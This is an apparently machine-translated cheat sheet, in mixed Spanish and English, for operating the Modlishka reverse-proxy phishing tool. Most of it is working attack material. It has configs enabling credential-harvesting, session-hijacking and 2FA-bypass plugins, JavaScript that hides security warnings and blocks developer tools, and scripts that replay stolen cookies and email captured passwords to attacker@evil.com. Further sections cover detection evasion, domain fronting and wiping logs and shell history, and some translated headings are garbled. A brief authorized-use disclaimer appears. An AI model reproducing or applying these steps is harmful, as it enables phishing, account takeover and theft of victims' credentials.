Modlishka Invierte la herramienta de Phishing Proxy
"Clase de la hoja" idbutton id="modlishka-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="modlishka-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Modlishka es una herramienta avanzada de phishing proxy desarrollado por drk1wi que permite ataques de phishing sofisticados con capacidades de bypass 2FA y secuestro de sesión. Actúa como un proxy transparente entre la víctima y el sitio web legítimo, capturando credenciales y fichas de sesión en tiempo real.
NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación
Binarios precompilados
# Download latest release for Linux
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
# Download for Windows
# Download Modlishka-windows-amd64.exe from GitHub releases
# Download for macOS
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-darwin-amd64
chmod +x Modlishka-darwin-amd64
Build from Source
# Install Go (version 1.19+)
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
make
# Cross-compile for different platforms
make build-all
Docker Instalación
# Build Docker image
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
docker build -t modlishka .
# Run Modlishka in Docker
docker run -it -p 443:443 -p 80:80 modlishka
Uso básico
Opciones de línea de mando
# Basic usage
./Modlishka -target https://example.com -domain evil.com
# With SSL certificate
./Modlishka -target https://example.com -domain evil.com -cert /path/to/cert.crt -certKey /path/to/key.key
# With configuration file
./Modlishka -config config.json
# Debug mode
./Modlishka -target https://example.com -domain evil.com -debug
Archivo de configuración
\\\\{
"proxyDomain": "evil.com",
"listeningAddress": "0.0.0.0",
"target": "https://example.com",
"targetRes": "",
"targetRules": "PC9oZWFkPg==",
"terminateTriggers": "",
"terminateUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules": "",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
\\\\}
Referencia del Comando
Parámetros básicos
| Parameter | Description |
|---|---|
-target |
Target website URL |
-domain |
Phishing domain |
-listeningAddress |
Listening IP address |
-cert |
SSL certificate file |
-certKey |
SSL private key file |
-config |
Configuration file path |
Parámetros avanzados
| Parameter | Description |
|---|---|
-debug |
Enable debug mode |
-log |
Log file path |
-plugins |
Plugin configuration |
-forceHTTPS |
Force HTTPS redirects |
-dynamicMode |
Enable dynamic mode |
-disableSecurity |
Disable security headers |
Configuración avanzada
Configuración SSL/TLS
# Generate self-signed certificate
openssl req -newkey rsa:4096 -nodes -keyout modlishka.key -x509 -days 365 -out modlishka.crt
# Use Let's Encrypt certificate
certbot certonly --standalone -d evil.com
./Modlishka -target https://example.com -domain evil.com -cert /etc/letsencrypt/live/evil.com/fullchain.pem -certKey /etc/letsencrypt/live/evil.com/privkey.pem
Configuración de las reglas de destino
\\\\{
"targetRules": "base64_encoded_rules",
"jsRules": "base64_encoded_js_rules"
\\\\}
Modificación del contenido Reglas
// JavaScript rules for content modification
// Base64 encode these rules for targetRules parameter
// Hide security warnings
document.querySelectorAll('.security-warning').forEach(el => el.style.display = 'none');
// Modify page title
document.title = 'Legitimate Service Login';
// Remove security indicators
document.querySelectorAll('.ssl-indicator').forEach(el => el.remove());
// Inject custom CSS
var style = document.createElement('style');
style.textContent = '.phishing-indicator \\\\{ display: none !important; \\\\}';
document.head.appendChild(style);
Configuración de plugin
\\\\{
"plugins": \\\\{
"credHarvester": \\\\{
"enabled": true,
"params": \\\\{
"log": "credentials.log",
"format": "json"
\\\\}
\\\\},
"sessionHijacker": \\\\{
"enabled": true,
"params": \\\\{
"cookieLog": "cookies.log"
\\\\}
\\\\},
"2faBypass": \\\\{
"enabled": true,
"params": \\\\{
"tokenLog": "tokens.log"
\\\\}
\\\\}
\\\\}
\\\\}
2FA Técnicas de bypass
Sesión Token Capture
# Modlishka automatically captures session tokens
# Monitor the log file for captured sessions
tail -f requests.log|grep -i "session\|token\|cookie"
# Extract session cookies
grep -o '"cookies":\[.*\]' requests.log|jq '.cookies'
Sesiones en tiempo real
# Python script to monitor and use captured sessions
import json
import requests
import time
def monitor_sessions(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2) # Go to end of file
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'cookies' in data:
cookies = data['cookies']
# Use captured cookies for session hijacking
hijack_session(cookies)
except:
pass
time.sleep(1)
def hijack_session(cookies):
session = requests.Session()
for cookie in cookies:
session.cookies.set(cookie['name'], cookie['value'])
# Access protected resources
response = session.get('https://example.com/dashboard')
print(f"Session hijack successful: \\\\{response.status_code\\\\}")
Subsidio TOTP/SMS
# Modlishka captures 2FA tokens in real-time
# The victim enters the 2FA code on the phishing site
# Modlishka forwards it to the legitimate site
# Session is established and captured
# Monitor 2FA bypass attempts
grep -i "2fa\|totp\|sms\|verification" requests.log
Técnicas de evacuación
Domain Fronting
# Use CDN for domain fronting
./Modlishka -target https://example.com -domain cdn.cloudflare.com -hostHeader evil.com
# Configure DNS for domain fronting
# Point evil.com to CDN IP
# Configure CDN to forward to Modlishka server
Obfuscación de tráfico
\\\\{
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"customHeaders": \\\\{
"X-Forwarded-For": "192.168.1.100",
"X-Real-IP": "192.168.1.100",
"Accept-Language": "en-US,en;q=0.9"
\\\\}
\\\\}
Medidas antidetección
// Inject anti-detection JavaScript
// Disable developer tools
document.addEventListener('keydown', function(e) \\\\{
if (e.key === 'F12'||(e.ctrlKey && e.shiftKey && e.key === 'I')) \\\\{
e.preventDefault();
return false;
\\\\}
\\\\});
// Disable right-click
document.addEventListener('contextmenu', function(e) \\\\{
e.preventDefault();
return false;
\\\\});
// Clear console
setInterval(function() \\\\{
console.clear();
\\\\}, 1000);
Geolocalización
# Python script for geolocation-based filtering
import geoip2.database
from flask import Flask, request, abort
app = Flask(__name__)
reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
ALLOWED_COUNTRIES = ['US', 'CA', 'GB']
@app.before_request
def check_geolocation():
client_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
try:
response = reader.city(client_ip)
country_code = response.country.iso_code
if country_code not in ALLOWED_COUNTRIES:
abort(404)
except:
# If geolocation fails, allow access
pass
Cosecha temporal
Análisis de registros
# Extract credentials from logs
grep -o '"username":"[^"]*"' requests.log|cut -d'"' -f4|sort -u
grep -o '"password":"[^"]*"' requests.log|cut -d'"' -f4
# Extract email addresses
grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]\\\\{2,\\\\}' requests.log|sort -u
# Extract session tokens
grep -o '"sessionToken":"[^"]*"' requests.log|cut -d'"' -f4
Vigilancia en tiempo real
# Real-time credential monitoring
import json
import time
import smtplib
from email.mime.text import MIMEText
def monitor_credentials(log_file):
with open(log_file, 'r') as f:
f.seek(0, 2)
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
send_notification(data['username'], data['password'])
except:
pass
time.sleep(1)
def send_notification(username, password):
msg = MIMEText(f"New credentials captured:\nUsername: \\\\{username\\\\}\nPassword: \\\\{password\\\\}")
msg['Subject'] = 'Modlishka - Credentials Captured'
msg['From'] = 'modlishka@evil.com'
msg['To'] = 'attacker@evil.com'
server = smtplib.SMTP('localhost')
server.send_message(msg)
server.quit()
Almacenamiento de bases de datos
# Store credentials in database
import sqlite3
import json
def store_credentials(log_file, db_file):
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
# Create table
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
id INTEGER PRIMARY KEY,
timestamp TEXT,
username TEXT,
password TEXT,
ip_address TEXT,
user_agent TEXT
)
''')
with open(log_file, 'r') as f:
for line in f:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
cursor.execute('''
INSERT INTO credentials
(timestamp, username, password, ip_address, user_agent)
VALUES (?, ?, ?, ?, ?)
''', (
data.get('timestamp'),
data.get('username'),
data.get('password'),
data.get('ip'),
data.get('userAgent')
))
except:
pass
conn.commit()
conn.close()
Seguridad operacional
Configuración de infraestructura
# Use VPS with clean IP reputation
# Implement proper DNS configuration
# Use legitimate SSL certificates
# Set up redirectors and load balancers
Gestión de registros
# Rotate logs to prevent disk space issues
logrotate -f /etc/logrotate.d/modlishka
# Secure log storage
chmod 600 requests.log
chown root:root requests.log
# Remote log shipping
rsync -avz requests.log user@backup-server:/logs/
Procedimientos de limpieza
# Secure deletion of logs
shred -vfz -n 3 requests.log
shred -vfz -n 3 credentials.log
# Clear system logs
journalctl --vacuum-time=1d
# Clear bash history
history -c
rm ~/.bash_history
Solución de problemas
Cuestiones de conexión
# Test target connectivity
curl -I https://example.com
# Check DNS resolution
dig evil.com
nslookup evil.com
# Test SSL certificate
openssl s_client -connect evil.com:443 -servername evil.com
Cuestiones SSL/TLS
# Verify certificate
openssl x509 -in modlishka.crt -text -noout
# Check certificate chain
openssl verify -CAfile ca.crt modlishka.crt
# Test SSL configuration
sslscan evil.com:443
Cuestiones de ejecución
# Monitor resource usage
top -p $(pgrep Modlishka)
# Check network connections
netstat -tulpn|grep Modlishka
# Monitor disk usage
df -h
du -sh requests.log
Modo de depuración
# Enable debug logging
./Modlishka -target https://example.com -domain evil.com -debug
# Analyze debug output
tail -f debug.log|grep -i error
# Check for common issues
grep -i "certificate\|ssl\|tls\|dns" debug.log
Evasión de detección
Nivel de red
- Use dominios y certificados legítimos
- Implementar la configuración DNS adecuada
- Utilice CDN y el frente de dominio
- Vary traffic patterns and timing
- Implementar un correcto manejo de errores
Nivel de aplicación
- Mimic comportamiento legítimo del sitio web
- Utilice los encabezados y respuestas HTTP adecuados
- Implementar medidas antibot
- Use agentes de usuario legítimos
- Casos de borde de mano con gracia
Comportamiento
- Duración del ataque límite
- Objetivo determinados usuarios/organizaciones
- Uso de la ingeniería social para el acceso inicial
- Implementar procedimientos adecuados de limpieza
- Monitor de indicadores de detección
Recursos
- Repositorio Modlishka GitHub
- Modlishka Documentation
- drk1wi Blog
- Reversa Técnicas de Phishing Proxy
- 2FA Bypass Research
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Modlishka. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *